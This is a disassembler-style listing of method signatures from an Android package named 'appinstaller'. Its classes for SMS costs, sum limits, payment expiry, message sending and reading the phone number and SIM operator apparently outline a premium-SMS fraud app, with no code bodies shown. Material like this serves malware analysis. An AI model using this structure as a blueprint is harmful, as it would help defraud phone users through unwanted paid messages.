Lcom/soft/android/appinstaller/ActivityTexts;-><init>(Ljava/lang/String; Ljava/lang/String;)V [access_flags=public constructor] @ 0x2ad8
Lcom/soft/android/appinstaller/ActivityTexts;->setError(Z)V [access_flags=public] @ 0x2b78
Ljava/lang/Object;-><init>()V
Lcom/soft/android/appinstaller/ActivityTexts;->setText(Ljava/lang/String;)V [access_flags=public] @ 0x2b90
Lcom/soft/android/appinstaller/ActivityTexts;->setTitle(Ljava/lang/String;)V [access_flags=public] @ 0x2ba8
Lcom/soft/android/appinstaller/ActivityTexts;-><init>(Ljava/lang/String; Ljava/lang/String; Z)V [access_flags=public constructor] @ 0x2b04
Lcom/soft/android/appinstaller/ActivityTexts;->getText()Ljava/lang/String; [access_flags=public] @ 0x2b30
Lcom/soft/android/appinstaller/ActivityTexts;->getTitle()Ljava/lang/String; [access_flags=public] @ 0x2b48
Lcom/soft/android/appinstaller/ActivityTexts;->isError()Z [access_flags=public] @ 0x2b60
Lcom/soft/android/appinstaller/FinishActivity;-><init>()V [access_flags=public constructor] @ 0x2bc0
Landroid/app/Activity;-><init>()V
Lcom/soft/android/appinstaller/FinishActivity;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x2bd8
Lcom/soft/android/appinstaller/FinishActivity;->findViewById(I)Landroid/view/View;
Lcom/soft/android/appinstaller/FinishActivity;->setContentView(I)V
Lcom/soft/android/appinstaller/core/Internals;->getOverridableValueForLocation(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x55e4
Lcom/soft/android/appinstaller/FinishActivity;->setTitle(Ljava/lang/CharSequence;)V
Landroid/widget/Button;->getText()Ljava/lang/CharSequence;
Lcom/soft/android/appinstaller/OpInfo;->getTextFinder()Lcom/soft/android/appinstaller/core/TextFinder; [access_flags=public] @ 0x45cc
Ljava/lang/Object;->toString()Ljava/lang/String;
Lcom/soft/android/appinstaller/core/TextFinder;->getFinishTexts()Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=public] @ 0x62f0
Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
Landroid/widget/TextView;->setMovementMethod(Landroid/text/method/MovementMethod;)V
Lcom/soft/android/appinstaller/OpInfo;->getInstance()Lcom/soft/android/appinstaller/OpInfo; [access_flags=public static] @ 0x4570
Lcom/soft/android/appinstaller/GlobalConfig;->getInstance()Lcom/soft/android/appinstaller/GlobalConfig; [access_flags=public static] @ 0x3450
Lcom/soft/android/appinstaller/OpInfo;->getInternals()Lcom/soft/android/appinstaller/core/Internals; [access_flags=public] @ 0x459c
Landroid/widget/Button;->setText(Ljava/lang/CharSequence;)V
Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
Lcom/soft/android/appinstaller/OpInfo;->init(Landroid/content/Context;)V [access_flags=public] @ 0x45e4
Lcom/soft/android/appinstaller/GlobalConfig;->init(Landroid/content/Context;)V [access_flags=public] @ 0x35e8
Landroid/text/method/ScrollingMovementMethod;-><init>()V
Lcom/soft/android/appinstaller/FinishActivity;->onExitClicked(Landroid/view/View;)V [access_flags=public] @ 0x2d10
Lcom/soft/android/appinstaller/FinishActivity;->finish()V
Landroid/util/Log;->v(Ljava/lang/String; Ljava/lang/String;)I
Lcom/soft/android/appinstaller/FinishActivity;->onKeyDown(I Landroid/view/KeyEvent;)Z [access_flags=public] @ 0x2d38
Landroid/app/Activity;->onKeyDown(I Landroid/view/KeyEvent;)Z
Lcom/soft/android/appinstaller/FinishActivity;->onNextClicked(Landroid/view/View;)V [access_flags=public] @ 0x2d5c
Landroid/content/Intent;-><init>(Ljava/lang/String; Landroid/net/Uri;)V
Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
Lcom/soft/android/appinstaller/GlobalConfig;->getValue(Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x3548
Lcom/soft/android/appinstaller/FinishActivity;->startActivity(Landroid/content/Intent;)V
Lcom/soft/android/appinstaller/FirstActivity;-><init>()V [access_flags=public constructor] @ 0x2dac
Lcom/soft/android/appinstaller/FirstActivity;->isPaymentExpired()Z [access_flags=] @ 0x2dc4
Lcom/soft/android/appinstaller/FirstActivity;->getSharedPreferences(Ljava/lang/String; I)Landroid/content/SharedPreferences;
Ljava/lang/System;->currentTimeMillis()J
Ljava/lang/String;->equals(Ljava/lang/Object;)Z
Ljava/lang/Long;->parseLong(Ljava/lang/String;)J
Landroid/content/SharedPreferences;->getLong(Ljava/lang/String; J)J
Lcom/soft/android/appinstaller/FirstActivity;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x2e58
Lcom/soft/android/appinstaller/FirstActivity;->setContentView(I)V
Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
Lcom/soft/android/appinstaller/FirstActivity;->findViewById(I)Landroid/view/View;
Lcom/soft/android/appinstaller/FirstActivity;->setTitle(Ljava/lang/CharSequence;)V
Landroid/widget/TextView;->setVisibility(I)V
Lcom/soft/android/appinstaller/core/TextFinder;->getRulesTexts()Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=public] @ 0x6350
Landroid/widget/LinearLayout;->setVisibility(I)V
Lcom/soft/android/appinstaller/GlobalConfig;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x3580
Ljava/lang/StringBuilder;-><init>()V
Lcom/soft/android/appinstaller/core/TextFinder;->getFirstActivityTexts()Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=public] @ 0x6320
Landroid/widget/Button;->setText(I)V
Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
Lcom/soft/android/appinstaller/FirstActivity;->onExitClicked(Landroid/view/View;)V [access_flags=public] @ 0x3130
Lcom/soft/android/appinstaller/FirstActivity;->finish()V
Lcom/soft/android/appinstaller/FirstActivity;->onNextClicked(Landroid/view/View;)V [access_flags=public] @ 0x3148
Lcom/soft/android/appinstaller/FlowController;->launchFinishActivity(Landroid/app/Activity;)V [access_flags=public static] @ 0x3368
Lcom/soft/android/appinstaller/QuestionActivity;->checkNextQuestions(Landroid/content/Context; Landroid/app/Activity;)V [access_flags=public static] @ 0x4658
Lcom/soft/android/appinstaller/FirstActivity;->updateLastAuthTime()V [access_flags=] @ 0x327c
Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String; J)Landroid/content/SharedPreferences$Editor;
Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
Landroid/content/SharedPreferences$Editor;->commit()Z
Lcom/soft/android/appinstaller/FirstActivity;->onRulesClicked(Landroid/view/View;)V [access_flags=public] @ 0x3180
Landroid/widget/Button;->setVisibility(I)V
Landroid/app/Activity;->startActivityForResult(Landroid/content/Intent; I)V
Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Lcom/soft/android/appinstaller/FlowController;-><init>()V [access_flags=public constructor] @ 0x32bc
Lcom/soft/android/appinstaller/FlowController;->getCurrentAlertID()I [access_flags=public static] @ 0x32d4
Lcom/soft/android/appinstaller/core/Internals;->getSmsInfo()Lcom/soft/android/appinstaller/core/SmsInfo; [access_flags=public] @ 0x5694
Lcom/soft/android/appinstaller/core/SmsInfo;->getAlertsCount()I [access_flags=public] @ 0x5bfc
Lcom/soft/android/appinstaller/GlobalConfig;->getRuntimeValue(Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x3524
Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
Lcom/soft/android/appinstaller/FlowController;->increaseCurrentAlertID()V [access_flags=public static] @ 0x3330
Ljava/lang/String;->valueOf(I)Ljava/lang/String;
Lcom/soft/android/appinstaller/GlobalConfig;->setRuntimeValue(Ljava/lang/String; Ljava/lang/String;)V [access_flags=public] @ 0x3688
Lcom/soft/android/appinstaller/FlowController;->sendMessages(Landroid/content/Context; Landroid/app/Activity;)V [access_flags=public static] @ 0x33d0
Landroid/app/Activity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
Lcom/soft/android/appinstaller/GlobalConfig;-><init>()V [access_flags=private constructor] @ 0x3414
Ljava/io/UnsupportedEncodingException;->printStackTrace()V
Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream; Ljava/lang/String;)V
Landroid/content/res/Resources;->openRawResource(I)Ljava/io/InputStream;
Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
Lcom/soft/android/appinstaller/GlobalConfig;->parseConfigLine(Ljava/lang/String;)V [access_flags=private] @ 0x347c
Landroid/content/Context;->getResources()Landroid/content/res/Resources;
Ljava/io/IOException;->printStackTrace()V
Ljava/util/HashMap;-><init>()V
Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
Ljava/util/HashMap;->put(Ljava/lang/Object; Ljava/lang/Object;)Ljava/lang/Object;
Ljava/lang/String;->indexOf(I)I
Ljava/lang/String;->substring(I I)Ljava/lang/String;
Ljava/lang/String;->substring(I)Ljava/lang/String;
Lcom/soft/android/appinstaller/GlobalConfig;->existsRuntimeValue(Ljava/lang/String;)Z [access_flags=public] @ 0x34c0
Ljava/util/HashMap;->containsKey(Ljava/lang/Object;)Z
Lcom/soft/android/appinstaller/GlobalConfig;->getPrefsName()Ljava/lang/String; [access_flags=public] @ 0x34e0
Lcom/soft/android/appinstaller/GlobalConfig;->getValueNull(Ljava/lang/String;)Z [access_flags=public] @ 0x35b4
Lcom/soft/android/appinstaller/HashConfig;-><init>()V [access_flags=public constructor] @ 0x36a4
Lcom/soft/android/appinstaller/HashConfig;->parseConfigLine(Ljava/lang/String;)V [access_flags=private] @ 0x36c4
Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
Lcom/soft/android/appinstaller/HashConfig;->get(Ljava/lang/Object;)Ljava/lang/Object; [access_flags=public] @ 0x3718
Lcom/soft/android/appinstaller/HashConfig;->getParam(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x3744
Lcom/soft/android/appinstaller/HashConfig;->init(Ljava/lang/String;)V [access_flags=public] @ 0x376c
Ljava/util/HashMap;->clear()V
Ljava/lang/String;->indexOf(I I)I
Ljava/lang/String;->length()I
Lcom/soft/android/appinstaller/HashConfig;->put(Ljava/lang/String; Ljava/lang/String;)V [access_flags=public] @ 0x37e4
Lcom/soft/android/appinstaller/HashConfig;->remove(Ljava/lang/Object;)V [access_flags=public] @ 0x380c
Ljava/util/HashMap;->remove(Ljava/lang/Object;)Ljava/lang/Object;
Lcom/soft/android/appinstaller/MemberActivity$1;-><init>(Lcom/soft/android/appinstaller/MemberActivity;)V [access_flags=constructor] @ 0x3828
Lcom/soft/android/appinstaller/MemberActivity$1;->onItemClick(Landroid/widget/AdapterView; Landroid/view/View; I J)V [access_flags=public] @ 0x3844
Lcom/soft/android/appinstaller/MemberActivity;->readWebpage(Landroid/view/View; Z)V [access_flags=public] @ 0x42c8
Lcom/soft/android/appinstaller/MemberActivity;->access$100(Lcom/soft/android/appinstaller/MemberActivity;)Ljava/lang/String; [access_flags=static synthetic] @ 0x3fac
Lcom/soft/android/appinstaller/RemoteCache;->getHistory()Ljava/util/Stack; [access_flags=public] @ 0x4a80
Ljava/util/List;->get(I)Ljava/lang/Object;
Lcom/soft/android/appinstaller/MemberActivity;->access$300(Lcom/soft/android/appinstaller/MemberActivity;)Ljava/util/List; [access_flags=static synthetic] @ 0x3ff4
Lcom/soft/android/appinstaller/MemberActivity;->access$200(Lcom/soft/android/appinstaller/MemberActivity;)Ljava/lang/String; [access_flags=static synthetic] @ 0x3fdc
Lcom/soft/android/appinstaller/MemberActivity;->access$000(Lcom/soft/android/appinstaller/MemberActivity;)Ljava/util/List; [access_flags=static synthetic] @ 0x3f94
Ljava/util/Stack;->push(Ljava/lang/Object;)Ljava/lang/Object;
Lcom/soft/android/appinstaller/MemberActivity;->startActivity(Landroid/content/Intent;)V
Lcom/soft/android/appinstaller/MemberActivity;->access$102(Lcom/soft/android/appinstaller/MemberActivity; Ljava/lang/String;)Ljava/lang/String; [access_flags=static synthetic] @ 0x3fc4
Lcom/soft/android/appinstaller/RemoteCache;->getInstance()Lcom/soft/android/appinstaller/RemoteCache; [access_flags=public static] @ 0x4a24
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;-><init>(Lcom/soft/android/appinstaller/MemberActivity;)V [access_flags=private constructor] @ 0x3a24
Landroid/os/AsyncTask;-><init>()V
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;-><init>(Lcom/soft/android/appinstaller/MemberActivity; Lcom/soft/android/appinstaller/MemberActivity$1;)V [access_flags=synthetic constructor] @ 0x3a40
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;->doInBackground([Ljava/lang/Object;)Ljava/lang/Object; [access_flags=protected bridge synthetic] @ 0x3a58
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;->doInBackground([Ljava/lang/String;)Ljava/lang/String; [access_flags=protected varargs] @ 0x3a78
Lcom/soft/android/appinstaller/RemoteCache;->getCache()Ljava/util/HashMap; [access_flags=public] @ 0x4a50
Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
Ljava/lang/StringBuffer;-><init>()V
Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
Ljava/lang/StringBuffer;->append(C)Ljava/lang/StringBuffer;
Lorg/apache/http/client/methods/HttpGet;-><init>(Ljava/lang/String;)V
Lorg/apache/http/HttpResponse;->getStatusLine()Lorg/apache/http/StatusLine;
Lorg/apache/http/HttpEntity;->getContent()Ljava/io/InputStream;
Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V
Lorg/apache/http/StatusLine;->getStatusCode()I
Lorg/apache/http/HttpResponse;->getEntity()Lorg/apache/http/HttpEntity;
Ljava/lang/Exception;->getMessage()Ljava/lang/String;
Lorg/apache/http/impl/client/DefaultHttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;->onPostExecute(Ljava/lang/Object;)V [access_flags=protected bridge synthetic] @ 0x3cc4
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;->onPostExecute(Ljava/lang/String;)V [access_flags=protected] @ 0x3ce0
Landroid/widget/ArrayAdapter;->notifyDataSetChanged()V
Ljava/util/List;->add(Ljava/lang/Object;)Z
Lcom/soft/android/appinstaller/MemberActivity;->setTitle(Ljava/lang/CharSequence;)V
Lcom/soft/android/appinstaller/MemberActivity;->access$400(Lcom/soft/android/appinstaller/MemberActivity;)Ljava/util/List; [access_flags=static synthetic] @ 0x400c
Ljava/util/List;->clear()V
Landroid/app/ProgressDialog;->dismiss()V
Lcom/soft/android/appinstaller/MemberActivity;->findViewById(I)Landroid/view/View;
Lcom/soft/android/appinstaller/MemberActivity;->finish()V
Lcom/soft/android/appinstaller/MemberActivity;->access$500(Lcom/soft/android/appinstaller/MemberActivity;)Landroid/widget/ArrayAdapter; [access_flags=static synthetic] @ 0x4024
Lcom/soft/android/appinstaller/MemberActivity;->access$602(Lcom/soft/android/appinstaller/MemberActivity; Landroid/widget/ListView;)Landroid/widget/ListView; [access_flags=static synthetic] @ 0x4054
Lcom/soft/android/appinstaller/MemberActivity;->access$600(Lcom/soft/android/appinstaller/MemberActivity;)Landroid/widget/ListView; [access_flags=static synthetic] @ 0x403c
Lcom/soft/android/appinstaller/MemberActivity;->startActivityForResult(Landroid/content/Intent; I)V
Lcom/soft/android/appinstaller/MemberActivity;->getApplicationContext()Landroid/content/Context;
Landroid/widget/ListView;->setSelection(I)V
Lcom/soft/android/appinstaller/MemberActivity$DownloadWebPageTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
Landroid/app/ProgressDialog;->show(Landroid/content/Context; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Z)Landroid/app/ProgressDialog;
Ljava/lang/String;->concat(Ljava/lang/String;)Ljava/lang/String;
Lcom/soft/android/appinstaller/MemberActivity;-><init>()V [access_flags=public constructor] @ 0x3f50
Lcom/soft/android/appinstaller/MemberActivity;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x406c
Lcom/soft/android/appinstaller/MemberActivity;->setContentView(I)V
Lcom/soft/android/appinstaller/RemoteCache;->getTypes()Ljava/util/List; [access_flags=public] @ 0x4ac8
Lcom/soft/android/appinstaller/RemoteCache;->getLinks()Ljava/util/List; [access_flags=public] @ 0x4ab0
Landroid/widget/ListView;->setAdapter(Landroid/widget/ListAdapter;)V
Landroid/widget/ArrayAdapter;-><init>(Landroid/content/Context; I Ljava/util/List;)V
Landroid/widget/ListView;->setOnItemClickListener(Landroid/widget/AdapterView$OnItemClickListener;)V
Lcom/soft/android/appinstaller/RemoteCache;->getData()Ljava/util/List; [access_flags=public] @ 0x4a68
Ljava/util/List;->isEmpty()Z
Lcom/soft/android/appinstaller/MemberActivity;->onKeyDown(I Landroid/view/KeyEvent;)Z [access_flags=public] @ 0x420c
Ljava/util/Stack;->pop()Ljava/lang/Object;
Ljava/util/Stack;->isEmpty()Z
Lcom/soft/android/appinstaller/MemberActivity;->onMemberExitClicked(Landroid/view/View;)V [access_flags=public] @ 0x4278
Lcom/soft/android/appinstaller/MemberActivity;->onMemberOpenClicked(Landroid/view/View;)V [access_flags=public] @ 0x42a0
Lcom/soft/android/appinstaller/MessageSender;-><init>()V [access_flags=private constructor] @ 0x4400
Ljava/util/ArrayList;-><init>()V
Lcom/soft/android/appinstaller/MessageSender;->getInstance()Lcom/soft/android/appinstaller/MessageSender; [access_flags=public static] @ 0x4428
Lcom/soft/android/appinstaller/MessageSender;->sendMessage(Landroid/content/Context; I)V [access_flags=private] @ 0x4454
Lcom/soft/android/appinstaller/MessageSender;->pushMessage(I)V [access_flags=public] @ 0x44c4
Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
Lcom/soft/android/appinstaller/MessageSender;->sendAvaitingMessages(Landroid/content/Context;)V [access_flags=public] @ 0x44e8
Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
Ljava/lang/Integer;->intValue()I
Ljava/util/ArrayList;->size()I
Lcom/soft/android/appinstaller/OpInfo;-><init>()V [access_flags=public constructor] @ 0x4550
Lcom/soft/android/appinstaller/core/Internals;->getLocationList()Ljava/util/List; [access_flags=public] @ 0x5570
Lcom/soft/android/appinstaller/core/Internals;-><init>(Landroid/content/Context;)V [access_flags=public constructor] @ 0x4b1c
Lcom/soft/android/appinstaller/core/TextFinder;-><init>(Landroid/content/Context; Ljava/util/List;)V [access_flags=public constructor] @ 0x5e30
Lcom/soft/android/appinstaller/core/PaymentMgr;-><init>()V [access_flags=public constructor] @ 0x5700
Landroid/app/Activity;->finish()V
Lcom/soft/android/appinstaller/QuestionActivity;-><init>()V [access_flags=public constructor] @ 0x4640
Lcom/soft/android/appinstaller/QuestionActivity;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x469c
Lcom/soft/android/appinstaller/QuestionActivity;->setTitle(Ljava/lang/CharSequence;)V
Lcom/soft/android/appinstaller/QuestionActivity;->setContentView(I)V
Lcom/soft/android/appinstaller/QuestionActivity;->findViewById(I)Landroid/view/View;
Lcom/soft/android/appinstaller/core/SmsInfo;->getAlert(I)Ljava/lang/String; [access_flags=public] @ 0x5bb0
Lcom/soft/android/appinstaller/QuestionActivity;->onKeyDown(I Landroid/view/KeyEvent;)Z [access_flags=public] @ 0x47ec
Lcom/soft/android/appinstaller/QuestionActivity;->onNoClicked(Landroid/view/View;)V [access_flags=public] @ 0x4810
Lcom/soft/android/appinstaller/core/SmsInfo;->setAlertResult(I Z)V [access_flags=public] @ 0x5cec
Lcom/soft/android/appinstaller/QuestionActivity;->startNextQuestion(Landroid/view/View; Z)V [access_flags=public] @ 0x48c8
Lcom/soft/android/appinstaller/QuestionActivity;->finish()V
Landroid/view/View;->getContext()Landroid/content/Context;
Lcom/soft/android/appinstaller/QuestionActivity;->onYesClicked(Landroid/view/View;)V [access_flags=public] @ 0x486c
Lcom/soft/android/appinstaller/R$attr;-><init>()V [access_flags=public constructor] @ 0x48ec
Lcom/soft/android/appinstaller/R$color;-><init>()V [access_flags=public constructor] @ 0x4904
Lcom/soft/android/appinstaller/R$drawable;-><init>()V [access_flags=public constructor] @ 0x491c
Lcom/soft/android/appinstaller/R$id;-><init>()V [access_flags=public constructor] @ 0x4934
Lcom/soft/android/appinstaller/R$layout;-><init>()V [access_flags=public constructor] @ 0x494c
Lcom/soft/android/appinstaller/R$raw;-><init>()V [access_flags=public constructor] @ 0x4964
Lcom/soft/android/appinstaller/R$string;-><init>()V [access_flags=public constructor] @ 0x497c
Lcom/soft/android/appinstaller/R;-><init>()V [access_flags=public constructor] @ 0x4994
Lcom/soft/android/appinstaller/RemoteCache;-><init>()V [access_flags=private constructor] @ 0x49c4
Ljava/util/Stack;-><init>()V
Ljava/util/List;->size()I
Lcom/soft/android/appinstaller/core/Internals;->init()V [access_flags=private] @ 0x52d0
Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Lcom/soft/android/appinstaller/core/Internals;->calculateLocation()V [access_flags=private] @ 0x4b74
Lcom/soft/android/appinstaller/core/Internals;->loadMCCMNCFile()V [access_flags=private] @ 0x53b8
Landroid/util/Log;->d(Ljava/lang/String; Ljava/lang/String;)I
Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
Lcom/soft/android/appinstaller/core/Internals;->loadSMSCFile()V [access_flags=private] @ 0x5478
Lcom/soft/android/appinstaller/core/Internals;->fillSmsInfo()V [access_flags=private] @ 0x4e28
Lcom/soft/android/appinstaller/core/Internals;->isConfigurationForLocation(Ljava/lang/String;)Z [access_flags=private] @ 0x5364
Landroid/util/Log;->i(Ljava/lang/String; Ljava/lang/String;)I
Lcom/soft/android/appinstaller/core/Internals;->getPhone()Ljava/lang/String; [access_flags=private] @ 0x521c
Lcom/soft/android/appinstaller/core/Internals;->getSimOperator()Ljava/lang/String; [access_flags=private] @ 0x5290
Lcom/soft/android/appinstaller/core/PrefixNamePair;->getPrefix()Ljava/lang/String; [access_flags=public] @ 0x5804
Lcom/soft/android/appinstaller/core/PrefixNamePair;->getName()Ljava/lang/String; [access_flags=public] @ 0x57ec
Lcom/soft/android/appinstaller/core/Internals;->getSimCountryIso()Ljava/lang/String; [access_flags=private] @ 0x5270
Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;
Landroid/telephony/TelephonyManager;->getSimOperator()Ljava/lang/String;
Landroid/telephony/TelephonyManager;->getSimCountryIso()Ljava/lang/String;
Lcom/soft/android/appinstaller/core/SmsInfo;->addSms(Lcom/soft/android/appinstaller/core/SmsInfo$SMS; Z)V [access_flags=public] @ 0x5ae8
Lcom/soft/android/appinstaller/core/Internals;->getParam(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=private] @ 0x51f8
Lcom/soft/android/appinstaller/core/SmsInfo;->setSumLimit(I)V [access_flags=public] @ 0x5da0
Lcom/soft/android/appinstaller/core/Internals;->getNValueForLocation(Ljava/lang/String; I Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x5588
Lcom/soft/android/appinstaller/core/SmsInfo;->addAlert(Ljava/lang/String;)V [access_flags=public] @ 0x5a88
Lcom/soft/android/appinstaller/core/SmsInfo;->setSmsCount(I)V [access_flags=public] @ 0x5d58
Lcom/soft/android/appinstaller/core/SmsInfo;->setDcSmsCount(I)V [access_flags=public] @ 0x5d10
Lcom/soft/android/appinstaller/core/SmsInfo;->sort()V [access_flags=public] @ 0x5de8
Lcom/soft/android/appinstaller/core/SmsInfo;-><init>()V [access_flags=public constructor] @ 0x5a28
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;-><init>(Ljava/lang/String; Ljava/lang/String; I)V [access_flags=public constructor] @ 0x5950
Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
Lcom/soft/android/appinstaller/core/Internals;->getSimOperatorName()Ljava/lang/String; [access_flags=private] @ 0x52b0
Landroid/telephony/TelephonyManager;->getSimOperatorName()Ljava/lang/String;
Ljava/util/Collections;->sort(Ljava/util/List; Ljava/util/Comparator;)V
Lcom/soft/android/appinstaller/core/PrefixComparator;-><init>()V [access_flags=constructor] @ 0x572c
Lcom/soft/android/appinstaller/core/PrefixNamePair;-><init>(Ljava/lang/String; Ljava/lang/String;)V [access_flags=public constructor] @ 0x57cc
Lcom/soft/android/appinstaller/core/Internals;->getValueForLocation(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x56ac
Lcom/soft/android/appinstaller/core/PrefixComparator;->compare(Lcom/soft/android/appinstaller/core/PrefixNamePair; Lcom/soft/android/appinstaller/core/PrefixNamePair;)I [access_flags=public] @ 0x5744
Ljava/lang/String;->compareTo(Ljava/lang/String;)I
Lcom/soft/android/appinstaller/core/PrefixComparator;->compare(Ljava/lang/Object; Ljava/lang/Object;)I [access_flags=public bridge synthetic] @ 0x57a8
Lcom/soft/android/appinstaller/core/ReplaceItem;-><init>(Ljava/lang/String; Ljava/lang/String;)V [access_flags=public constructor] @ 0x581c
Lcom/soft/android/appinstaller/core/ReplaceItem;->setTo(Ljava/lang/String;)V [access_flags=public] @ 0x5888
Lcom/soft/android/appinstaller/core/ReplaceItem;->setFrom(Ljava/lang/String;)V [access_flags=public] @ 0x5870
Lcom/soft/android/appinstaller/core/ReplaceItem;->getFrom()Ljava/lang/String; [access_flags=public] @ 0x5840
Lcom/soft/android/appinstaller/core/ReplaceItem;->getTo()Ljava/lang/String; [access_flags=public] @ 0x5858
Lcom/soft/android/appinstaller/core/SMSComparator;-><init>()V [access_flags=constructor] @ 0x58a0
Lcom/soft/android/appinstaller/core/SMSComparator;->compare(Lcom/soft/android/appinstaller/core/SmsInfo$SMS; Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)I [access_flags=public] @ 0x58b8
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->getCost()I [access_flags=public] @ 0x597c
Lcom/soft/android/appinstaller/core/SMSComparator;->compare(Ljava/lang/Object; Ljava/lang/Object;)I [access_flags=public bridge synthetic] @ 0x58fc
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->setData(Ljava/lang/String;)V [access_flags=public] @ 0x59dc
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->setCost(I)V [access_flags=public] @ 0x59c4
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->setNumber(Ljava/lang/String;)V [access_flags=public] @ 0x59f4
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;-><init>()V [access_flags=public constructor] @ 0x5920
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->getNumber()Ljava/lang/String; [access_flags=public] @ 0x59ac
Lcom/soft/android/appinstaller/core/SmsInfo$SMS;->getData()Ljava/lang/String; [access_flags=public] @ 0x5994
Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
Ljava/util/List;->set(I Ljava/lang/Object;)Ljava/lang/Object;
Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
Lcom/soft/android/appinstaller/core/SmsInfo;->addSms(Ljava/lang/String; Ljava/lang/String; I Z)V [access_flags=public] @ 0x5b7c
Lcom/soft/android/appinstaller/core/SmsInfo;->getAlertResult(I)Ljava/lang/Boolean; [access_flags=public] @ 0x5bd4
Lcom/soft/android/appinstaller/core/SmsInfo;->getConfirmableSMS(I)Lcom/soft/android/appinstaller/core/SmsInfo$SMS; [access_flags=public] @ 0x5c1c
Lcom/soft/android/appinstaller/core/SmsInfo;->getConfirmableSmsCount()I [access_flags=public] @ 0x5c40
Lcom/soft/android/appinstaller/core/SmsInfo;->getUnconfirmableSMS(I)Lcom/soft/android/appinstaller/core/SmsInfo$SMS; [access_flags=public] @ 0x5ca8
Lcom/soft/android/appinstaller/core/SmsInfo;->getUnconfirmableSmsCount()I [access_flags=public] @ 0x5ccc
Lcom/soft/android/appinstaller/core/SmsInfo;->getSumLimit()I [access_flags=public] @ 0x5c90
Lcom/soft/android/appinstaller/core/SmsInfo;->getSmsCount()I [access_flags=public] @ 0x5c78
Lcom/soft/android/appinstaller/core/SmsInfo;->getDcSmsCount()I [access_flags=public] @ 0x5c60
Lcom/soft/android/appinstaller/core/TextFinder;->getTextForLocation(Ljava/lang/String;)Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=private] @ 0x5f1c
Lcom/soft/android/appinstaller/core/TextFinder;->getReplaces()Ljava/util/ArrayList; [access_flags=private] @ 0x5e60
Lcom/soft/android/appinstaller/core/TextFinder;->readFile(Ljava/lang/String; Ljava/util/ArrayList;)Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=private] @ 0x6104
Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
Lcom/soft/android/appinstaller/core/TextFinder;->replace(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; [access_flags=private static] @ 0x6278
Ljava/io/IOException;->getMessage()Ljava/lang/String;
Landroid/content/res/AssetManager;->open(Ljava/lang/String;)Ljava/io/InputStream;
Landroid/content/Context;->getAssets()Landroid/content/res/AssetManager;
Lcom/soft/android/appinstaller/core/TextFinder;->readFile(I Ljava/util/ArrayList;)Lcom/soft/android/appinstaller/ActivityTexts; [access_flags=private] @ 0x5fe8
Ljava/lang/String;->indexOf(Ljava/lang/String; I)I
Ljava/lang/String;->indexOf(Ljava/lang/String;)I
